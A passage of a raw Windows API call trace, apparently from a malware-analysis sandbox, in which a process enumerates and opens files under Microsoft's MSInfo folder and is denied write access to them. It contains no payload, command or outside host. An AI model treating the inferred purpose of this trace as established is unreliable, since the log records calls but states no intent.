(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0085.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0085.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0085.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0085.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0085.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0085.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0085.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0085.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0085.968] AreFileApisANSI () returned 1 [0085.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US", lpUsedDefaultChar=0x0) returned 60 [0085.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0085.969] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.969] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0085.969] AreFileApisANSI () returned 1 [0085.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0085.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0085.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US") returned 60 [0085.969] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.969] GetLastError () returned 0x5 [0085.969] GetLastError () returned 0x5 [0085.969] SetLastError (dwErrCode=0x5) [0085.969] GetLastError () returned 0x5 [0085.969] SetLastError (dwErrCode=0x5) [0085.969] GetLastError () returned 0x5 [0085.969] SetLastError (dwErrCode=0x5) [0085.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.969] AreFileApisANSI () returned 1 [0085.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0085.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a9b0 [0085.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US") returned 60 [0085.970] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.970] GetLastError () returned 0x5 [0085.970] GetLastError () returned 0x5 [0085.970] SetLastError (dwErrCode=0x5) [0085.970] GetLastError () returned 0x5 [0085.970] SetLastError (dwErrCode=0x5) [0085.970] GetLastError () returned 0x5 [0085.970] SetLastError (dwErrCode=0x5) [0085.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0085.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0085.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0085.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0085.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0085.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0085.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0085.970] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463aec8d, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x63793f1, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463aec8d, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x5a600, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0085.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0085.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0085.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0085.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0085.971] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78310 [0086.204] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa098aa4a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.204] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bb38282, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x73430dfb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x261f2e00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x7800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 1 [0086.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0086.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0086.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0086.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0086.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0086.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0086.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0086.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0086.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0086.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0086.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0086.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0086.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0086.205] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.205] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.205] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.205] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0086.205] AreFileApisANSI () returned 1 [0086.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui", lpUsedDefaultChar=0x0) returned 77 [0086.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0086.205] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.205] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0086.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0086.205] AreFileApisANSI () returned 1 [0086.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0086.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0086.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 77 [0086.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.207] GetFileType (hFile=0x348) returned 0x1 [0086.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.207] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0086.207] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0086.208] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0086.208] CloseHandle (hObject=0x348) returned 1 [0086.208] AreFileApisANSI () returned 1 [0086.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0086.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0086.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 77 [0086.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.210] GetLastError () returned 0x5 [0086.210] GetLastError () returned 0x5 [0086.210] SetLastError (dwErrCode=0x5) [0086.210] GetLastError () returned 0x5 [0086.210] SetLastError (dwErrCode=0x5) [0086.210] GetLastError () returned 0x5 [0086.210] SetLastError (dwErrCode=0x5) [0086.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0086.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0086.210] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.210] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.210] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x98, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5f7a0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x98, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓砀")) returned 0 [0086.210] FindClose (in: hFindFile=0x78310 | out: hFindFile=0x78310) returned 1 [0086.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0086.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0086.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0086.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0086.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0086.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0086.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0086.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0086.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0086.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0086.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0086.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0086.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.220] AreFileApisANSI () returned 1 [0086.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe", lpUsedDefaultChar=0x0) returned 67 [0086.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0086.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0086.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0086.221] AreFileApisANSI () returned 1 [0086.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0086.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82688 [0086.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe") returned 67 [0086.221] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.222] GetFileType (hFile=0x424) returned 0x1 [0086.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0086.222] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0086.222] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0086.222] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0086.222] CloseHandle (hObject=0x424) returned 1 [0086.222] AreFileApisANSI () returned 